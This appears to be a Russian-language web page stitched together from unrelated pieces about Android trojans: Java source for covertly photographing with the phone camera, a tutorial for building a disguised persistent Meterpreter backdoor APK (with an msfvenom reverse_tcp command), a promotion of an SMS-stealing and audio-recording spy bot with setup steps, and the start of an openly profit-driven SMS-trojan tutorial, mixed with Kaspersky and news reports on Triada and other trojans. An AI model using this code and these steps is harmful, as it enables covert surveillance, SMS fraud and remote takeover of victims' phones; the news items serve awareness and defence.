Троян на андроид – Банковский троян Triada обнаружен в 42 моделях бюджетных Android-смартфонов — «Хакер»

Как создать троян на Андроид. Как написать шпион для Андроид

public class SilentCamera2 {

    private Context context;

    private CameraDevice device;

    private ImageReader imageReader;

    private CameraCaptureSession session;

    private SurfaceTexture surfaceTexture;

    private CameraCharacteristics characteristics;

    private Surface previewSurface;

    private CaptureRequest.Builder request;

    private Handler handler;

 

    private String photosDir;

 

    public SilentCamera2(Context context) {

        this.context = context;

    }

 

    private final CameraDevice.StateCallback mStateCallback =

            new CameraDevice.StateCallback() {

        @Override

        public void onOpened(CameraDevice cameraDevice) {

            device = cameraDevice;

 

            try {

                surfaceTexture = new SurfaceTexture(10);

                previewSurface = new Surface(surfaceTexture);

 

                List<Surface> surfaceList = new ArrayList<>();

                surfaceList.add(previewSurface);

                surfaceList.add(imageReader.getSurface());

 

                cameraDevice.createCaptureSession(surfaceList, mCaptureStateCallback, handler);

            } catch (Exception e) {

            }

        }

 

        @Override

        public void onDisconnected(CameraDevice cameraDevice) {

 

        }

 

        @Override

        public void onError(CameraDevice cameraDevice, int error) {

 

        }

    };

 

    private CameraCaptureSession.StateCallback mCaptureStateCallback =

            new CameraCaptureSession.StateCallback() {

                @Override

                public void onConfigured(CameraCaptureSession captureSession) {

                    session = captureSession;

 

                    try {

                        request = device.createCaptureRequest(CameraDevice.TEMPLATE_PREVIEW);

                        request.addTarget(previewSurface);

 

                        request.set(CaptureRequest.CONTROL_AF_TRIGGER,

                            CameraMetadata.CONTROL_AF_TRIGGER_START);

 

                        captureSession.setRepeatingRequest(request.build(), mCaptureCallback, handler);

                    } catch (Exception e) {

                    }

                }

 

                @Override

                public void onConfigureFailed(CameraCaptureSession mCaptureSession) {}

            };

 

    private CameraCaptureSession.CaptureCallback mCaptureCallback =

            new CameraCaptureSession.CaptureCallback() {

        @Override

        public void onCaptureCompleted(CameraCaptureSession session,

                                     CaptureRequest request,

                                     TotalCaptureResult result) {

        }

    };

 

    private final ImageReader.OnImageAvailableListener mOnImageAvailableListener =

            new ImageReader.OnImageAvailableListener() {

        @Override

        public void onImageAvailable(ImageReader reader) {

            DateFormat dateFormat = new SimpleDateFormat(«yyyy-MM-dd-HH-mm-ss»);

            Date date = new Date();

 

            String filename = photosDir + «/» + dateFormat.format(date) + «.jpg»;

            File file = new File(filename);

 

            Image image = imageReader.acquireLatestImage();

 

            try {

                ByteBuffer buffer = image.getPlanes()[0].getBuffer();

                byte[] bytes = new byte[buffer.remaining()];

                buffer.get(bytes);

 

                OutputStream os = new FileOutputStream(file);

                os.write(bytes);

 

                image.close();

                os.close();

            } catch (Exception e) {

                e.getStackTrace();

            }

 

            closeCamera();

        }

    };

 

    private void takePicture() {

        request.set(CaptureRequest.JPEG_ORIENTATION, getOrientation());

 

        request.addTarget(imageReader.getSurface());

        try {

            session.capture(request.build(), mCaptureCallback, handler);

        } catch (CameraAccessException e) {

        }

    }

 

    private void closeCamera() {

        try {

            if (null != session) {

                session.abortCaptures();

                session.close();

                session = null;

            }

            if (null != device) {

                device.close();

                device = null;

            }

            if (null != imageReader) {

                imageReader.close();

                imageReader = null;

            }

            if (null != surfaceTexture) {

                surfaceTexture.release();

            }

        } catch (Exception e) {

        }

    }

 

    public boolean takeSilentPhoto(String cam, String dir) {

        photosDir = dir;

        int facing;

 

        switch (cam) {

            case «front»:

                facing = CameraCharacteristics.LENS_FACING_FRONT;

                break;

            case «back»:

                facing = CameraCharacteristics.LENS_FACING_BACK;

                break;

            default:

                return false;

        }

 

        CameraManager manager = (CameraManager)

                context.getSystemService(Context.CAMERA_SERVICE);

 

        String cameraId = null;

        characteristics = null;

 

        try {

            for (String id : manager.getCameraIdList()) {

                characteristics = manager.getCameraCharacteristics(id);

                Integer currentFacing = characteristics.get(CameraCharacteristics.LENS_FACING);

                if (currentFacing != null && currentFacing == facing) {

                    cameraId = id;

                    break;

                }

            }

        } catch (Exception e) {

            return false;

        }

 

        HandlerThread handlerThread = new HandlerThread(«CameraBackground»);

        handlerThread.start();

        handler = new Handler(handlerThread.getLooper());

 

        imageReader = ImageReader.newInstance(1920,1080, ImageFormat.JPEG, 2);

        imageReader.setOnImageAvailableListener(mOnImageAvailableListener, handler);

 

        try {

            manager.openCamera(cameraId, mStateCallback, handler);

            // Ждем фокусировку

            Thread.sleep(1000);

            takePicture();

        } catch (Exception e) {

            Log.d(TAG, «Can’t open camera: » + e.toString());

            return false;

        }

 

        return true;

    }

 

    private int getOrientation() {

        WindowManager wm = (WindowManager) context.getSystemService(Context.WINDOW_SERVICE);

        int rotation = wm.getDefaultDisplay().getRotation();

        int deviceOrientation = 0;

 

        switch(rotation){

            case Surface.ROTATION_0:

                deviceOrientation = 0;

                break;

            case Surface.ROTATION_90:

                deviceOrientation = 90;

                break;

            case Surface.ROTATION_180:

                deviceOrientation = 180;

                break;

            case Surface.ROTATION_270:

                deviceOrientation = 270;

                break;

        }

 

        int sensorOrientation = characteristics.get(CameraCharacteristics.SENSOR_ORIENTATION);

        deviceOrientation = (deviceOrientation + 45) / 90 * 90;

        boolean facingFront = characteristics.get(CameraCharacteristics.LENS_FACING) == CameraCharacteristics.LENS_FACING_FRONT;

        if (facingFront) deviceOrientation = -deviceOrientation;

        return (sensorOrientation + deviceOrientation + 360) % 360;

    }

}

Triada: очень страшный троянец для Android

Как обычно передвигаются армии: вперед посылают разведчиков, чтобы те узнали, все ли в порядке, и скорректировали маршрут для основных сил. По крайней мере, примерно так это выглядело до пришествия эпохи кибервойн. Как оказалось, троянцы ведут себя примерно так же.

Существует очень много мелких троянцев для Android, которые получают права суперпользователя и используют их в своих грязных целях. Никита Бучка и Михаил Кузин, вирусные аналитики из «Лаборатории Касперского», могут с ходу назвать 11 семейств таких троянцев. Большинство из них практически безобидны — в основном они специализируются на показе рекламы и скачивании себе подобных. На Securelist есть целая статья, посвященная как раз таким зловредам.

Если продолжать военную аналогию, то эти «невинные» троянцы — как раз и есть разведчики. Как мы уже упоминали, права суперпользователя дают им возможность скачивать и устанавливать другие программы. Именно поэтому стоит одному такому троянцу попасть в систему, как через несколько минут в ней появляются и все остальные. Наши исследователи предположили, что рано или поздно их начнут использовать для доставки «на дом», то есть к вам в телефон, гораздо более опасных зловредов.

Три летних семейства мобильных троянцев, использующих рут-права https://t.co/AbWUfkS69R

— Securelist Russia (@securelist_ru) August 27, 2015

Именно так и произошло. Мелкие троянцы вроде Leech, Ztorg и Gopro теперь скачивают один из самых сложных и хитрых троянов на сегодняшний день. Мы называем его Triada.

Речь идет о модульном троянце, активно использующем root-привилегии для того, чтобы изменять системные файлы. Кроме того, он существует по большей части лишь в оперативной памяти устройства, поэтому его очень сложно засечь.

Темный путь «Триады»

Попав в устройство, эти троянцы первым делом собирают данные о системе: модель устройства, версия ОС, объем SD-карты, список установленных приложений и тому подобное. Затем зловред отправляет собранную информацию на командный сервер. Мы засекли целых 17 таких серверов, расположенных на четырех разных доменах. Как видите, авторы данного ПО вполне знакомы с тем, что такое резервирование.

Получив сообщение от троянца, командный сервер в ответ посылает ему файл с конфигурациями, содержащий персональный ID зараженного устройства и набор настроек: через какие временные промежутки зловред должен будет связываться с сервером, какие модули ему нужно установить и тому подобное. После установки модулей они стираются из памяти устройства и остаются только в оперативной памяти. Так троянец прячет себя.

Есть еще несколько причин, почему «Триаду» так сложно обнаружить и почему она так впечатлила наших исследователей. Во-первых, этот троянец модифицирует процесс Zygote. Это один из базовых процессов в ОС Android, который используется как своего рода основа для любого другого приложения. В результате, как только «Триада» добирается до «Зиготы», хитрый зловред становится частью каждого установленного на устройстве приложения.

Во-вторых, «Триада» также умеет подменять системные функции и использует это для того, чтобы скрывать свои модули из списков запущенных процессов и установленных приложений. Поэтому жертва вообще не замечает, что что-то не так с устройством, и не беспокоится ни о чем.

Это не весь список того, что троянец меняет в системе. Также «Триада» наложила свою лапу на отправляемые SMS и заполучила возможность фильтрации входящих сообщений. Именно таким образом киберпреступники решили монетизировать свою разработку.

Много подробностей о том, как SMS-троянец служит вирусописателям, обходя CAPTCHA и делая другие крутые штуки: http://t.co/AmdIRxQlmK

— Kaspersky Lab (@Kaspersky_ru) March 10, 2015

Некоторые приложения используют SMS вместо Интернета для совершения внутренних покупок. Основное преимущество такого метода — то, что для покупки не нужно подключение к Интернету. Пользователи не видят таких сообщений, так как они обрабатываются не программой для чтения SMS, а собственно приложением, инициирующим перевод, например, очередной условно бесплатной игрой для мобильного.

«Триада» использует этот прием, чтобы выводить деньги со счета пользователя. Троянец модифицирует финансовые сообщения таким образом, чтобы деньги приходили не на счет разработчиков мобильных приложений, а на счет преступников. В результате жертвами «Триады» становятся либо пользователи, не получившие игровую «плюшку», за которую заплатили, либо разработчики мобильных приложений, до которых не дошли деньги (если пользователь все-таки получил свой игровой предмет).

Пока это единственный способ, с помощью которого преступники могут получать прибыль от «Триады», но не забывайте: мы говорим о модульном троянце. Стоит дописать еще пару модулей, отправить команду на их скачивание — и он может научиться делать буквально что угодно: права доступа у него для этого есть.

Коллеги обнаружили банковский троянец Asacub, атакующий пользователей Android-устройств: https://t.co/OzaLCtkBcZ pic.twitter.com/kaZ4bWC2Sm

— Kaspersky Lab (@Kaspersky_ru) January 20, 2016

Как прогнать преступников из своего телефона?

Самое неприятное в истории с «Триадой» то, что от нее с большой вероятностью могут пострадать очень много людей. Согласно нашим данным, во второй половине 2015 года каждый десятый пользователь Android был атакован теми самыми мелкими троянцами, получающими права суперпользователя, которые среди прочего могут устанавливать на устройство «Триаду». Таким образом, жертвами этого троянца уже могут быть миллионы пользователей.

Так как защитить себя от мерзкого проныры? Не так уж сложно.

1. Во-первых, всегда устанавливать последние системные обновления. Мелким зловредам сложно перехватить root-привилегии в устройствах с Android 4.4.4 и выше, так как большое количество уязвимостей в этих версиях ОС было закрыто. Если на вашем телефоне установлена более-менее современная операционная система, вы находитесь в относительной безопасности. Однако наша статистика показывает, что около 60% пользователей Android сидят на Android 4.4.2 и более древних версиях этой ОС. И вот для них шанс заразиться весьма высок.

2. Во-вторых, лучше вообще не испытывать судьбу и не подсчитывать вероятность тех или иных шансов. Надежную защиту вашего устройства обеспечит только хороший антивирус. Известно немало случаев, когда даже в официальных магазинах Google находили троянцев (собственно, мелкие зловреды, скачивающие «Триаду, как раз из таких). Так что рекомендуем вам установить надежное защитное решение.

Kaspersky Internet Security для Android обнаруживает все три модуля, используемых «Триадой», и может защитить ваш счет от загребущих ручек создателей троянца. Только не забывайте, что в бесплатной версии мобильного антивируса сканирование нужно запускать вручную и достаточно регулярно.

Подведем итоги: «Триада» — это еще один весьма наглядный пример неприятной тенденции. Разработчики вредоносного ПО начали воспринимать Android всерьез. Более того, они научились эффективно использовать его уязвимости.

Образцы мобильных троянцев, обнаруженные нами в последнее время, почти такие же сложные и скрытные, как и их Windows-собратья. Единственный способ эффективной борьбы с ними — это не дать им попасть в устройство, поэтому так важно установить хорошее защитное решение.

Собираем скрытый троян на Android(persistence) Часть I

Привет с вами DarkNode
Вся инфа в ознокомительных целях,автор не несет ответственности за область ее применения!

Сегодня будем учиться делать скрытый троян|бекдор на андроид средствами разработки на Android Studio и используя исходник от Android Meterpreter Payload с дальнейшим закреплением в системе.

Что нам понадобится:

Android Studio и Android SDK

офф_сайт(

Скрыто от гостей

)
Android Meterpreter Payload source code (

Скрыто от гостей

)
Ссылки так же будут в описании видео

Первый этап (Подготовительный):
Качаем SourceCode(исходник) метерпретора под андроид,ставим андроид студию и SDK (Этот момент я расписывать не буду
если у кого то возникнут трудности — стучитесь в личку)
(При установке SDK вы можете скачать пакеты AVD(Аndroid Virtual Device|Аднроид эмуляторов) для тестирования приложения на эмулированом устройстве,но как по мне то эти эмуляторы очень таки медленные и лучше тестировать на своем реальном девайсе или же использовать другой эмулятор (например genymotion или образы андроида для виртуалок) Ссылки на то как настроить студию с генимоушн или физическим девайсом я кину в конце статьи и в описания видео.
Ну я уже все скачал.Показывать процесс установки не буду.Опять же таки если трудности возникнут с установкой( но не должны))) ) -стучите личку.

Запускаем студию,создаем проект,даем ему имя. Выбираем минимальную версию API андроида,я выбрал IceCreamSandwich 4.0 так как



это самая распространенная версия Android по статистике разработчиков.
Выбираем приложения без активити (activity) — это означает что при запуске не будет никаких
визуальных окон (activity) и приложения просто запуститься себе и будет висеть в фоне.

На этом подготовительный этап завершен

Скрыто от гостей

Скрыто от гостей

Второй этап (Базовые настройки пейлоада)
Открываем наш проект в студии.


Далее распаковываем скаченный архив с гитхаба с исходниками метерпретера. Находим там папку \backdooredapk\ где лежат наши java файлы и перетаскиваем их в наш проект в андроид студии.

Далее первым шагом же изменим в файле payload.java ip адрес нашего листенера(нашей атакующей машины,где у нас запущен метаслоит)

Затем нам будет интересен файл MyIntentService.java,в котором мы сможем опционально задать интервал времени через которое наш бекдор будет конектиться к машине атакуищего.
(long half_an_hour = (3600)/(2); //время в секундах между каждой попыткой открыть новую meterpreter сессию » Я для демонстрации поставлю минуту» )

Далее нам понадобится AndroidManifest.xml из архива. Возьмем от туда пользовательские разрешение (user.permisions) и все что между тегами <application></application>
После того как мы копипасним пермишенс и апликейшн нам нужно будет опционально изменить(указать) имя активити(<activiyt>android:name) и имя службы(<Service>android:name)



Хотя студия сама нам это покажет что не нашла пути которое по дефолту был в тегах активити и сервиса(выделит их красным цветом).
Нужно заменить их (stage.metasploit.com на com.darknode.google_update в моем случае «путь(имя) к вашему проекту»)

Но в манифесте (AndroidManifest.xml) из архива есть один небольшой косяк.После копипаста его в наш проект нужно добавить права(permisions),так как там не полный нужный нам список прав.
Для этого возьмем и реверснем апк созданный с помощью msfvenon:
msfvenom -p android/meterpreter/reverse_tcp lhost=айпи lport=порт r > ./meter.apk(хотя айпи и порт можно рандомный,нам нужен только манифест от туда)


Скопируем разрешение с манифеста в наш проект

Далее осталось подписать наше приложения.

Подписали) Ну что ж давайте протестим.))



На этом наш этап пока закончим.Продолжения следует в следующей статье(видео)
Всем спасибо.

Делаем шпион для Андройда (AndroRat + AndroRat Binder)

Пишут толи его продавали с 4000 ботов толи за 4000смех-смех!!! гугл транслэйт не разобрать Две цитаты о этом андроид-боте:
So, this software is sold, the price 4k bot, complete you get the admin panel is configured on your server + web control room + APK file with a unique interface designed for your needs, as well as continued support for the product.

4k por ese trojan eek.gif . Yo conozco uno que aunque sea de pago, tiene muchisimas mas funciones, theftspy; funciones de whatsapp,audio,correo,archivos, etc etc etc.
Бот +веб-панелька в комплекте.
Особенности(перевод Гугла,но я думаю понятно):
-Грабинг всю информацию о жертве (номер телефона, ICCID, IMEI, IMSI, Модель, ОС)
— Перехват входящих SMS сообщений и отправки их на веб-панели и диспетчерской.
— Переадресация на любой номер
— Грабинг весь входящий и исходящий SMS
— Грабинг все входящие и исходящие звонки
— Запись аудио, отправив его на сервер (знаю, что происходит вокруг)
— Отправка SMS в любой комнате без ведома владельца
Установка:
1) Распакуйте содержимое папки smsbot (1) / админ.
2) Редактировать все PHP файлы., Изменение ‘<? для ‘<? PHP’ (если не сделано не будет работать во многих хостингах).
3) Импорт базы данных.
4) изменения пароля администратора пользователя в таблице пользователей (пароль должен быть зашифрован с MD5).
5) Изменить файл «dbconfig.php ‘.

Я еще не обнаружили, как строитель / сервер редактируется. В папке «SRC» найти оригинальный АПК и папка «Инструменты» найти инструменты декомпилировать. Это перемещает файл в папку ING.apk инструментов, а затем открыть CMD, перейдите к папке «Инструменты» и выполните следующую команду:

CODE:

java -jar "apktool.jar" d ing.apk c:/ruta/para/decompilar/
Пароль:111

 

Троян под Android работает после «выключения» смартфона — «Хакер»

Существует миф, что спецслужбы могут отслеживать местоположение даже выключенного мобильника. Новый троян под Android 5+ в каком-то смысле реализует эту концепцию.

Специалисты из антивирусной компании AVG рассказывают о зловреде, который продолжает работать даже когда телефон кажется выключенным. Получив рутовые права в системе, он перехватывает вызов на выключение аппарата, затем показывает фирменную анимацию выключения телефона и гасит экран. Пользователь думает, что телефон выключен, но на самом деле он работает: троян может осуществлять исходящие вызовы, делать фотографии и осуществлять другие поставленные задачи.

Под Android при нажатии кнопки Power активируется функция interceptKeyBeforeQueueing, которая вызывает соответствующий процесс.

Когда кнопка отпущена, активируется intereceptPowerKeyUp.

На экране возникает диалог, предоставляя выбор из нескольких действий.

Если выбрать опцию выключения аппарата, вызывается mWindowManagerFuncs.shutdown.

И вот здесь после обращения к функции ShutDownThread.shutdown непосредственно инициируется процедура отключения питания на физическом уровне.

Вредоносная программа запускает процесс в фоновом режиме и перехватывает вызовы к mWindowManagerFuncs. Таким образом, когда пользователь выбирает опцию отключения энергии, вместо системного процесса запускается анимация, после чего экран отключается, но аппарат продолжает работу.

Троян обнаружили в китайских магазинах приложений и к настоящему моменту заразил около 10 000 устройств.

Написание СМС трояна для Android [ 1 часть ]

Приветствую! Планирую сделаю серию гайдов по написанию смс трояна на эту замечательную ось. Это будет вступительная часть, думаю, вы все поймете. Поехали!

Предисловие

Начиналось все с жажды наживы. Да и думаю у всех тех, кто читает эту статью есть это желание. Поэтому мы вы ее и читаете, давайте по честному. Я не скрываю, что хотел подзаработать данным способом, что является незаконным. Благо я уже нашел место в этом мире и занялся более выгодной и неприхотливой работой.

Я нигде не брал исходники, я хотел сделать свой проект на полностью чистой основе. Выкладываю я это лишь для того, чтобы обогатить свой и ваш опыт в данной сфере.

ПРИМЕНЕНИЕ ПОДОБНОГО ПО ОТНОШЕНИЮ К ЛЮДЯМ С ЦЕЛЬЮ ПОЙМАТЬ ЛЕГКОГО БАБЛА КАРАЕТСЯ ЗАКОНОМ!

Среда разработки

Среду разработки для андроид приложений выберем вполне обычную для таких случаев: Android Studio. Как же установить его и приступить к работе? Сейчас разберем.

1. Перейдите на сайт

Скрыто от гостей

и установите версию для вашего устройства.

2. Соглашаетесь со всеми условиями, выбираете эмулятор ( Сразу советую ставить Nexus 5X API 28 x86 как у меня ) И ожидайте установку всех необходимых пакетов и собственно эмулятора, это может занять длительное время!!

3. У вас откроется окошко, создайте новый проект. Соглашаетесь со всем до выбора активити.

4. Активити советую выбирать Empty, так, думаю, будет более удобнее писать.

5. Все, у вас все открылось и готово собственно к написанию кода!

Первые шаги!

Среду разработки настроили, она готова. Осталось только одно: сделать рабочий код. У меня уже есть исходники впринципе, но буду писать все сначала. Все будет выглядеть примерно так.
Проект
Как только сделали проект, сразу стоит зайти в AndroidManifest.xml. Именно оттуда мы будем стартовать. Мы же пишем СМС приложение, да? Так нам нужны разрешение, чтобы наш троян мог отправлять/просматривать/удалять/пересылать сообщения. За все отвечает этот xml файлик. Именно этот текстовый файлик одна из самых главных частей проекта. Там будут условия, например: Что делать нашему приложению когда приходит смс? Что будет когда телефон перезагрузился? Какие разрешения нужны?

Пока что отделаемся только разрешениями на эту часть статьи. Выставим их!

Код

<uses-permission android:name=»android.permission.READ_PHONE_STATE» /> // читать телефонные контакты ( для распространения соответственно )
<uses-permission android:name=»android.permission.WRITE_SMS » /> // писать смс
<uses-permission android:name=»android.permission.READ_SMS» /> // возможность читать смс
<uses-permission android:name=»android.permission.SEND_SMS» /> // возможность отправлять смс
<uses-permission android:name=»android.permission.RECEIVE_SMS» /> // возможность получать смс нашему приложению
<uses-permission android:name=»android.permission.INTERNET» /> // доступ к интернету нашему приложению


Вот так это должно выглядеть после того, как вы все сделаете. Пример
Но, если вы и выставили эти разрешения, они не будут активированы. Вам нужно чтобы пользователь их подтвердил, окошечко подтверждения не будет вылазить если вы все выставите в xml файле, вам нужно прописать вызов этих окон ручками. А андроид манифест это проводник вашего приложения, глаза и уши вашего трояна, так сказать.


Планировка приложения​


Все будет действовать по одной схеме и все будет начинаться с класса MainActivity. Именно он будет задействован когда пользователь откроет наш подарочек. Именно из этого класса мы будем вызывать другие классы, он будет отправной точкой нашего приложения.

Пользователь открыл приложение —-> вызов MainActivity ——> вызов других классов.

В MainActivity я впихал все необходимое, маскировка и показывание фишинг окна для того, чтобы юзер дал нам разрешения для СМС.

Заключение

Вот и закончилась 1 часть моей серии. Здесь мы обсудили именно основы и приступили к планировки нашего приложения. Отправной путь пройден, осталось только кодить и кодить! В следующей части мы научимся маскировать, показывать фальшивое окно для фишинга, воровать смски и закрепляться в системе. Если поддержите — то хорошо, будет целый цикл. Остановился пока только на этом, всем удачи.

Ссылка на 2 часть

Эксперты нашли троян в популярном Android-приложении

Исследователи из «Лаборатории Касперского» обнаружили троян в популярном Android-приложении CamScanner. С помощью вируса хакеры могут показывать на заражённых смартфонах надоедливую рекламу и даже красть у пользователей деньги.

CamScanner предназначено для сканирования документов. Оно вышло в 2010 году и было загружено более 100 миллионов раз. Распространять вирус приложение начало лишь недавно, но, судя по всему, оно успело заразить довольно много устройств.

Эксперты нашли троян в популярном Android-приложении для сканирования документов

Троян загружает с серверов злоумышленников вредоносный код и запускает его на смартфоне. После этого хакеры могут производить на устройстве самые разные действия. Например, подписывать пользователя на платные услуги без его ведома.

Сейчас CamScanner нельзя скачать из Google Play, хоть оно там и доступно. В последней версии приложения разработчики убрали троян: вы можете обновить программу и продолжить ей пользоваться. Но лучше удалить CamScanner: кто знает, какие ещё уязвимости могут в нём быть.

Читайте также 🧐

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *